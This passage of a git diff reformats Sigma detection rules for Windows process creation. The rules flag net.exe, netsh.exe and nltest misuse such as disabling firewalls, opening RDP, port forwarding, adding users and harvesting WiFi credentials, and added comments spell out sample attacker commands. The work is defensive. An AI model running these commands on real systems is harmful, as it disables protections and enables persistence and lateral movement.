https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community @@ -19,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: ' start ' + CommandLine|contains: ' start ' # space character after the 'start' keyword indicates that a service name follows, in contrast to `net start` discovery expression condition: process_creation and (all of selection_*) falsepositives: - Legitimate administrator or user executes a service for legitimate reasons. diff --git a/sigma/builtin/process_creation/proc_creation_win_net_stop_service.yml b/sigma/builtin/process_creation/proc_creation_win_net_stop_service.yml index b6a7e0c89..8b8c518cf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_stop_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_stop_service.yml @@ -1,8 +1,8 @@ title: Stop Windows Service Via Net.EXE id: 88872991-7445-4a22-90b2-a3adadb0e827 related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: obsoletes status: test description: Detects the stopping of a Windows service author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) @@ -18,17 +18,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: - - net.exe - - net1.exe - - NewProcessName|endswith: - - \net.exe - - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe selection_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' condition: process_creation and (all of selection_*) falsepositives: - - There are many legitimate reasons to stop a service. This rule isn't looking - for any suspicious behaviour in particular. Filter legitimate activity accordingly + - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_net_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_net_susp_execution.yml index d3987f0b0..77c15a1d8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_susp_execution.yml @@ -8,8 +8,7 @@ references: - https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html - https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe -author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community - (improvements) +author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements) date: 2019/01/16 modified: 2022/07/11 tags: @@ -34,14 +33,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' group' - ' localgroup' - ' user' @@ -57,7 +56,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine - following the search for easy hunting by computer/CommandLine. + - Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine. level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_net_use_mount_admin_share.yml b/sigma/builtin/process_creation/proc_creation_win_net_use_mount_admin_share.yml index bf3a9a747..7b3e60ac0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_use_mount_admin_share.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_use_mount_admin_share.yml @@ -1,14 +1,13 @@ title: Windows Admin Share Mount Via Net.EXE id: 3abd6094-7027-475f-9630-8ab9be7b9725 related: - - id: f117933c-980c-4f78-b384-e3d838111165 - type: similar + - id: f117933c-980c-4f78-b384-e3d838111165 + type: similar status: test description: Detects when an admin share is mounted using net.exe references: - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view -author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, - wagga +author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga date: 2020/10/05 modified: 2023/02/21 tags: @@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' use ' - ' \\\\*\\*$' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_net_use_mount_internet_share.yml b/sigma/builtin/process_creation/proc_creation_win_net_use_mount_internet_share.yml index c23164aeb..fc6d42312 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_use_mount_internet_share.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_use_mount_internet_share.yml @@ -1,8 +1,7 @@ title: Windows Internet Hosted WebDav Share Mount Via Net.EXE id: 7e6237fe-3ddb-438f-9381-9bf9de5af8d0 status: experimental -description: Detects when an internet hosted webdav share is mounted using the "net.exe" - utility +description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility references: - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view author: Nasreddine Bencherchali (Nextron Systems) @@ -19,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' use ' - ' http' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_net_use_mount_share.yml b/sigma/builtin/process_creation/proc_creation_win_net_use_mount_share.yml index 793713046..a88437bab 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_use_mount_share.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_use_mount_share.yml @@ -1,8 +1,8 @@ title: Windows Share Mount Via Net.EXE id: f117933c-980c-4f78-b384-e3d838111165 related: - - id: 3abd6094-7027-475f-9630-8ab9be7b9725 - type: similar + - id: 3abd6094-7027-475f-9630-8ab9be7b9725 + type: similar status: test description: Detects when a share is mounted using the "net.exe" utility references: @@ -21,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' use ' - ' \\\\' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_net_use_password_plaintext.yml b/sigma/builtin/process_creation/proc_creation_win_net_use_password_plaintext.yml index 0119f8299..1091da1f8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_use_password_plaintext.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_use_password_plaintext.yml @@ -23,19 +23,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' use ' - :*\\ - /USER:* * filter_empty: - CommandLine|endswith: ' ' + CommandLine|endswith: ' ' condition: process_creation and (all of selection_* and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_net_user_add.yml b/sigma/builtin/process_creation/proc_creation_win_net_user_add.yml index e4f72fd2e..cbe817c04 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_user_add.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_user_add.yml @@ -1,8 +1,8 @@ title: New User Created Via Net.EXE id: cd219ff3-fa99-45d4-8380-a7d15116c6dc related: - - id: b9f0e6f5-09b4-4358-bae4-08408705bd5c - type: similar + - id: b9f0e6f5-09b4-4358-bae4-08408705bd5c + type: similar status: test description: Identifies the creation of local users via the net.exe command. references: @@ -22,14 +22,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - user - add condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_net_user_add_never_expire.yml b/sigma/builtin/process_creation/proc_creation_win_net_user_add_never_expire.yml index 11aad919f..3eddb5323 100644 --- a/sigma/builtin/process_creation/proc_creation_win_net_user_add_never_expire.yml +++ b/sigma/builtin/process_creation/proc_creation_win_net_user_add_never_expire.yml @@ -1,11 +1,10 @@ title: New User Created Via Net.EXE With Never Expire Option id: b9f0e6f5-09b4-4358-bae4-08408705bd5c related: - - id: cd219ff3-fa99-45d4-8380-a7d15116c6dc - type: derived + - id: cd219ff3-fa99-45d4-8380-a7d15116c6dc + type: derived status: test -description: Detects creation of local users via the net.exe command with the option - "never expire" +description: Detects creation of local users via the net.exe command with the option "never expire" references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - user - add - expires:never diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_add_rule.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_add_rule.yml index 987ca3ba0..e088d772d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_add_rule.yml +++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_add_rule.yml @@ -19,18 +19,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - NewProcessName|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' firewall ' - ' add ' filter_optional_dropbox: - CommandLine|contains: - - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program - Files (x86)\Dropbox\Client\Dropbox.exe" enable=yes profile=Any - - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program - Files\Dropbox\Client\Dropbox.exe" enable=yes profile=Any + CommandLine|contains: + - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program Files (x86)\Dropbox\Client\Dropbox.exe" enable=yes profile=Any + - advfirewall firewall add rule name=Dropbox dir=in action=allow "program=?:\Program Files\Dropbox\Client\Dropbox.exe" enable=yes profile=Any condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - Legitimate administration activity diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml index daf355183..829368a4c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml @@ -1,8 +1,7 @@ title: Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE id: a35f5a72-f347-4e36-8895-9869b0d5fc6d status: test -description: Detects Netsh command execution that whitelists a program located in - a suspicious location in the Windows Firewall +description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall references: - https://www.virusradar.com/en/Win32_Kasidet.AD/description - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100 @@ -20,22 +19,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - NewProcessName|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - - CommandLine|contains|all: - - firewall - - add - - allowedprogram - - CommandLine|contains|all: - - advfirewall - - firewall - - add - - rule - - action=allow - - program= + - CommandLine|contains|all: + - firewall + - add + - allowedprogram + - CommandLine|contains|all: + - advfirewall + - firewall + - add + - rule + - action=allow + - program= selection_paths: - CommandLine|contains: + CommandLine|contains: - :\$Recycle.bin\ - :\RECYCLER.BIN\ - :\RECYCLERS.BIN\ diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml index 4cd4f7526..1bb41ca0e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml @@ -1,8 +1,7 @@ title: RDP Connection Allowed Via Netsh.EXE id: 01aeb693-138d-49d2-9403-c4f52d7d3d62 status: test -description: Detects usage of the netsh command to open and allow connections to port - 3389 (RDP). As seen used by Sarwent Malware +description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware references: - https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/ author: Sander Wiebing @@ -19,15 +18,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - NewProcessName|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + # Example: + # Old: netsh firewall add portopening TCP 3389 "Open Port 3389" + # New: netsh advfirewall firewall add rule name= "Open Port 3389" dir=in action=allow protocol=TCP localport=3389 + CommandLine|contains|all: - 'firewall ' - 'add ' - 'tcp ' - '3389' - CommandLine|contains: + CommandLine|contains: - portopening - allow condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_delete_rule.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_delete_rule.yml index b630a2974..e9f2986b7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_delete_rule.yml +++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_delete_rule.yml @@ -1,8 +1,7 @@ title: Firewall Rule Deleted Via Netsh.EXE id: 1a5fefe6-734f-452e-a07d-fc1c35bce4b2 status: test -description: Detects the removal of a port or application rule in the Windows Firewall - configuration using netsh +description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh references: - https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/ author: frack113 @@ -19,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - NewProcessName|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - firewall - 'delete ' filter_optional_dropbox: - CommandLine|contains: name=Dropbox + CommandLine|contains: name=Dropbox ParentProcessName|endswith: \Dropbox.exe condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_disable.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_disable.yml index 37d8b22b6..9346fcde5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_disable.yml +++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_disable.yml @@ -21,20 +21,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - NewProcessName|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli_1: - CommandLine|contains|all: + # Example: netsh firewall set opmode disable + CommandLine|contains|all: - firewall - set - opmode - disable selection_cli_2: - CommandLine|contains|all: + # Example: netsh advfirewall set currentprofile state off + CommandLine|contains|all: - advfirewall - set - state - - 'off' + - off condition: process_creation and (selection_img and 1 of selection_cli_*) falsepositives: - Legitimate administration activity diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml index a71931462..92fe9ff2d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml +++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml @@ -1,8 +1,7 @@ title: Netsh Allow Group Policy on Microsoft Defender Firewall id: 347906f3-e207-4d18-ae5b-a9403d6bcdef status: test -description: Adversaries may modify system firewalls in order to bypass controls limiting - network usage +description: Adversaries may modify system firewalls in order to bypass controls limiting network usage references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall - https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - NewProcessName|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - advfirewall - firewall - set diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml index ce36f5517..a4fc613ba 100644 --- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml @@ -1,8 +1,7 @@ title: Firewall Configuration Discovery Via Netsh.EXE id: 0e4164da-94bc-450d-a7be-a4b176179f1f status: experimental -description: Adversaries may look for details about the network configuration and - settings of systems they access or through information discovery of remote systems +description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules - https://ss64.com/nt/netsh.html @@ -20,14 +19,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - NewProcessName|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'netsh ' - 'show ' - 'firewall ' - CommandLine|contains: + CommandLine|contains: - 'config ' - 'state ' - 'rule ' diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_set_rule.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_set_rule.yml index f68837360..819761940 100644 --- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_set_rule.yml +++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_set_rule.yml @@ -1,8 +1,7 @@ title: Firewall Rule Update Via Netsh.EXE id: a70dcb37-3bee-453a-99df-d0c683151be6 status: test -description: Detects execution of netsh with the "advfirewall" and the "set" option - in order to set new values for properties of a existing rule +description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule references: - https://ss64.com/nt/netsh.html author: X__Junior (Nextron Systems) @@ -17,10 +16,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - NewProcessName|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: + # Example 1: netsh advfirewall firewall set rule "group=\"Network Discovery\" " new enable=Yes" + # Example 2: netsh advfirewall firewall set rule "group=\"File and Printer Sharing\" " new enable=Yes" - ' firewall ' - ' set ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml index 1fc454447..8d2e48474 100644 --- a/sigma/builtin/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml +++ b/sigma/builtin/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml @@ -1,16 +1,13 @@ title: Potential Persistence Via Netsh Helper DLL id: 56321594-9087-49d9-bf10-524fe8479452 related: - - id: c90362e0-2df3-4e61-94fe-b37615814cb1 - type: similar - - id: e7b18879-676e-4a0e-ae18-27039185a8e7 - type: similar + - id: c90362e0-2df3-4e61-94fe-b37615814cb1 + type: similar + - id: e7b18879-676e-4a0e-ae18-27039185a8e7 + type: similar status: test -description: 'Detects the execution of netsh with "add helper" flag in order to add - a custom helper DLL. This technique can be abused to add a malicious helper DLL - that can be used as a persistence proxy that gets called when netsh.exe is executed. - - ' +description: | + Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md - https://github.com/outflanknl/NetshHelperBeacon @@ -31,10 +28,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: netsh.exe - - NewProcessName|endswith: \netsh.exe + - OriginalFileName: netsh.exe + - NewProcessName|endswith: \netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - add - helper condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_packet_capture.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_packet_capture.yml index b16e499d9..6a8f10fa5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_netsh_packet_capture.yml +++ b/sigma/builtin/process_creation/proc_creation_win_netsh_packet_capture.yml @@ -1,8 +1,7 @@ title: New Network Trace Capture Started Via Netsh.EXE id: d3c3861d-c504-4c77-ba55-224ba82d0118 status: test -description: Detects the execution of netsh with the "trace" flag in order to start - a network capture +description: Detects the execution of netsh with the "trace" flag in order to start a network capture references: - https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/ - https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/ @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - NewProcessName|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - trace - start condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding.yml index 58c471c4b..e40953597 100644 --- a/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding.yml +++ b/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding.yml @@ -1,14 +1,12 @@ title: New Port Forwarding Rule Added Via Netsh.EXE id: 322ed9ec-fcab-4f67-9a34-e7c6aef43614 status: test -description: Detects the execution of netsh commands that configure a new port forwarding - (PortProxy) rule +description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule references: - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html - https://adepts.of0x.cc/netsh-portproxy-code/ - https://www.dfirnotes.net/portproxy_detection/ -author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan - Poudel +author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel date: 2019/01/29 modified: 2023/09/01 tags: @@ -24,22 +22,23 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - NewProcessName|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - interface - portproxy - add - v4tov4 selection_cli_2: - CommandLine|contains|all: - - 'i ' - - 'p ' - - 'a ' - - 'v ' + CommandLine|contains|all: + # Example: netsh I p a v l=8001 listena=127.0.0.1 connectp=80 c=192.168.1.1 + - 'i ' # interface + - 'p ' # portproxy + - 'a ' # add + - 'v ' # v4tov4 selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - connectp - listena - c= diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml index 326ea71d1..43e596ac5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml +++ b/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml @@ -1,8 +1,7 @@ title: RDP Port Forwarding Rule Added Via Netsh.EXE id: 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63 status: test -description: Detects the execution of netsh to configure a port forwarding of port - 3389 (RDP) rule +description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule references: - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html author: Florian Roth (Nextron Systems), oscd.community @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - NewProcessName|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' i' - ' p' - =3389 diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml index 40bd6b660..42014122a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml +++ b/sigma/builtin/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - NewProcessName|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - wlan - ' s' - ' p' diff --git a/sigma/builtin/process_creation/proc_creation_win_nltest_execution.yml b/sigma/builtin/process_creation/proc_creation_win_nltest_execution.yml index 5a7436bcb..106fe4a9e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_nltest_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_nltest_execution.yml @@ -1,10 +1,10 @@ title: Nltest.EXE Execution id: 903076ff-f442-475a-b667-4f246bcc203b related: - - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 - type: similar - - id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 - type: obsoletes + - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 + type: similar + - id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 + type: obsoletes status: test description: Detects nltest commands that can be used for information discovery references: @@ -24,8 +24,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \nltest.exe - - OriginalFileName: nltestrk.exe + - NewProcessName|endswith: \nltest.exe + - OriginalFileName: nltestrk.exe condition: process_creation and selection falsepositives: - Legitimate administration activity diff --git a/sigma/builtin/process_creation/proc_creation_win_nltest_recon.yml b/sigma/builtin/process_creation/proc_creation_win_nltest_recon.yml index c84738f64..1ea15022c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_nltest_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_nltest_recon.yml @@ -1,12 +1,12 @@ title: Potential Recon Activity Via Nltest.EXE id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 related: - - id: 410ad193-a728-4107-bc79-4419789fcbf8 - type: similar - - id: 903076ff-f442-475a-b667-4f246bcc203b - type: similar - - id: 77815820-246c-47b8-9741-e0def3f57308 - type: obsoletes + - id: 410ad193-a728-4107-bc79-4419789fcbf8 + type: similar + - id: 903076ff-f442-475a-b667-4f246bcc203b + type: similar + - id: 77815820-246c-47b8-9741-e0def3f57308 + type: obsoletes status: test description: Detects nltest commands that can be used for information discovery references: @@ -33,21 +33,21 @@ detection: EventID: 4688 Channel: Security selection_nltest: - - NewProcessName|endswith: \nltest.exe - - OriginalFileName: nltestrk.exe + - NewProcessName|endswith: \nltest.exe + - OriginalFileName: nltestrk.exe selection_recon: - - CommandLine|contains|all: - - server - - query - - CommandLine|contains: - - /user - - all_trusts - - 'dclist:' - - 'dnsgetdc:' - - domain_trusts - - 'dsgetdc:' - - parentdomain - - trusted_domains + - CommandLine|contains|all: + - server + - query + - CommandLine|contains: + - /user + - all_trusts # Flag for /domain_trusts + - 'dclist:' + - 'dnsgetdc:' + - domain_trusts + - 'dsgetdc:' + - parentdomain + - trusted_domains condition: process_creation and (all of selection_*) falsepositives: - Legitimate administration use but user and host must be investigated diff --git a/sigma/builtin/process_creation/proc_creation_win_node_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_node_abuse.yml index 17453069a..a16c24ba8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_node_abuse.yml +++ 